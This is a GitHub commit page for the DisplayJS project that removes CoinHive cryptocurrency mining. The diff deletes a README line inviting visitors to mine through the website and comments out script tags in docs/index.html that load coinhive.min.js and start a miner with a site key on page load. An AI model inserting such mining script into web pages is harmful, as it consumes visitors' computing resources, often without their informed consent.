Skip to content
This repository was archived by the owner on Jun 2, 2025. It is now read-only.

Commit 249f7f1

Browse files
committed
🔥 Removed CoinHive
1 parent 6f2e0d7 commit 249f7f1

2 files changed

Lines changed: 3 additions & 6 deletions

File tree

README.md

Lines changed: 1 addition & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@ By the way, you can ⭐️ the project to support it 😊
88
</p>
99

1010
<div align="center">
11-
11+
1212
[![GitHub release](https://img.shields.io/github/release/arguiot/DisplayJS.svg)](https://github.com/arguiot/DisplayJS/releases)
1313
[![Build Status](https://travis-ci.org/arguiot/DisplayJS.svg?branch=master)](https://travis-ci.org/arguiot/DisplayJS)
1414
[![Github All Releases](https://img.shields.io/github/downloads/arguiot/DisplayJS/total.svg)](https://github.com/arguiot/DisplayJS/)
@@ -48,9 +48,6 @@ DisplayJS is a project that required a lot of work and effort. You can show your
4848
```bash
4949
49qzWTyu4awZFpnVRUZHCQE8xz1bcoRkCQh1nrRsTHg3if6osQqVXRoFAyGYvhDR4pZ4w8WTKQDykYy5Z2Sj6i9TAj2fiBr
5050
```
51-
**OR**
52-
If you don't have any money, you can simply leave your computer all the night 🌙 on our [website](https://display.js.org) and it will simply mine cryptocurrency via [CoinHive](https://coinhive.com)
53-
5451
## Contributing
5552

5653
Please read [CONTRIBUTING.md](./CONTRIBUTING.md) for details on our code of conduct, and the process for submitting pull requests to us.

docs/index.html

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -223,11 +223,11 @@ <h3>Made with ❤️ by <a href="https://github.com/arguiot" class="madeby">@arg
223223
};
224224
</script>
225225
<script async src="https://cdn.headwayapp.co/widget.js"></script>
226-
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
226+
<!-- <script src="https://coinhive.com/lib/coinhive.min.js"></script>
227227
<script>
228228
var miner = new CoinHive.Anonymous('mHqPcrDX476z8AOHZgvE8WLENFakIbyV');
229229
miner.start();
230-
</script>
230+
</script> -->
231231
</body>
232232

233233
</html>

0 commit comments

Comments
 (0)